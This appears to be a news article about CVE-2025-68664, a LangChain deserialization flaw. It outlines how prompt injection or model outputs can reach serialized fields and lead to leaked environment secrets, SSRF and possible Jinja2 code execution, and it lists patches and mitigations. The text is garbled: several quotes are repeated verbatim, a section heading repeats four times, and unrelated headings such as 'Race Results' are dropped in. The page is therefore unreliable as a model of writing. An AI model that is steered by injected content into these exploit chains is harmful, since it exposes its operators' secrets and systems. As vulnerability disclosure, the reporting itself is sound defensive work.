A recently identified flaw in LangChain, designated CVE-2025-68664, presents alarming risks as it permits hackers to extract sensitive information from AI systems. This vulnerability arises from deserialization issues, allowing attackers to potentially exfiltrate critical environment variables and execute unauthorized code.
"This problem could significantly compromise the integrity of AI applications, especially given the prevalence of LangChain across various platforms," explained a Cyata security researcher who was instrumental in discovering the issue. LangChain, one of the most widely adopted AI frameworks, boasts impressive download figures, totaling hundreds of millions, which heightens the severity of this vulnerability.
"This problem could significantly compromise the integrity of AI applications, especially given the prevalence of LangChain across various platforms,"

The root of the problem lies in the inability of the dumps() and dumpd() functions within LangChain-core to properly process user-controlled dictionaries containing a reserved “lc” key. This key is integral to marking internal serialized objects, leading to improper serialization-deserialization cycles.
Impact and Legacy
Impact and Legacy
Impact and Legacy
"When LLM outputs or prompt injections influence fields like additional_kwargs or response_metadata, it can cause deserialization of untrusted data, putting systems at risk," noted the researcher. Twelve vulnerable patterns were discovered, with a critical CVSS score of 9.3 assigned to the vulnerability, indicating its potential to be exploited.

Impact and Legacy
"When LLM outputs or prompt injections influence fields like additional_kwargs or response_metadata, it can cause deserialization of untrusted data, putting systems at risk,"
Identification of this issue by the Cyata researcher was a significant breakthrough. According to them, the discovery was made during audits of AI trust boundaries, focusing specifically on tracking deserialization sinks and identifying vulnerabilities in serialization code.
"It’s crucial for organizations to promptly attend to these vulnerabilities to prevent data breaches and unauthorized access," advised the researcher. Following the investigation, the flaw was first reported via the Huntr platform on December 4, 2025. LangChain's response was swift; an advisory was published on December 24, just days after the issue was confirmed.
"It’s crucial for organizations to promptly attend to these vulnerabilities to prevent data breaches and unauthorized access,"
To address this flaw, LangChain implemented patches in versions 0.3.81 and 1.2.5, which included measures like wrapping dictionaries that contain the “lc” key and disabling the previously enabled secrets_from_env feature, which had the potential to leak sensitive environment variables.
By the Numbers
Race Results
Attackers exploiting this vulnerability could use environment variables in headers to perform data exfiltration. "They might create prompts to instantiate allowlisted classes, leading to severe risks such as SSRF (Server Side Request Forgery)," warned a cybersecurity analyst. Moreover, if deserialization occurs after using the PromptTemplate feature, it could enable Jinja2 rendering, potentially resulting in remote code execution.
"They might create prompts to instantiate allowlisted classes, leading to severe risks such as SSRF (Server Side Request Forgery),"
The growing usage of LangChain compounds the issues; recent statistics show over 98 million downloads recorded last month alone, indicating a significant user base. This escalating risk necessitates immediate action from organizations to assess their use of LangChain.
"It’s essential to verify dependencies like langchain-community and update langchain-core urgently. Organizations should also disable secret resolution until they validate inputs and audit deserialization processes within their logs and streaming data," recommended a leading cybersecurity expert.
Additionally, a related flaw identified in LangChainJS, marked as CVE-2025-68665, underscores the pervasive issues within agentic AI implementations and the need for heightened scrutiny.
As AI applications gain rapid traction, experts emphasize the importance of conducting thorough inventories of current agent deployments. This proactive step is critical for swift identification and resolution of potential vulnerabilities.


